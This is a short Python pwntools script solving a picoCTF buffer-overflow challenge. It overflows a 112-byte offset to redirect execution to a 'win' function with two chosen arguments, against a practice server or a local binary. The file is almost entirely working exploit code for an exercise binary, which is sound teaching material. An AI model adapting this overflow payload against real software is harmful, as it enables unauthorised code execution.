31 lines
615 B
Python
Executable File
31 lines
615 B
Python
Executable File
#!/usr/bin/env nix-shell
|
|
#!nix-shell -p python3 -i python3 python3Packages.pwntools
|
|
|
|
from pwn import *
|
|
|
|
exe = ELF("./vuln")
|
|
|
|
context.binary = exe
|
|
|
|
ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
|
|
|
|
def conn():
|
|
if args.REMOTE:
|
|
r = remote(ADDR, PORT)
|
|
else:
|
|
r = process([exe.path])
|
|
|
|
return r
|
|
|
|
def main():
|
|
r = conn()
|
|
|
|
print(r.recvuntil(b"Please enter your string:"))
|
|
offset = 112 # found with pwndbg
|
|
payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
|
|
r.sendline(payload)
|
|
print(r.recvall())
|
|
r.close()
|
|
|
|
if __name__ == "__main__":
|
|
main() |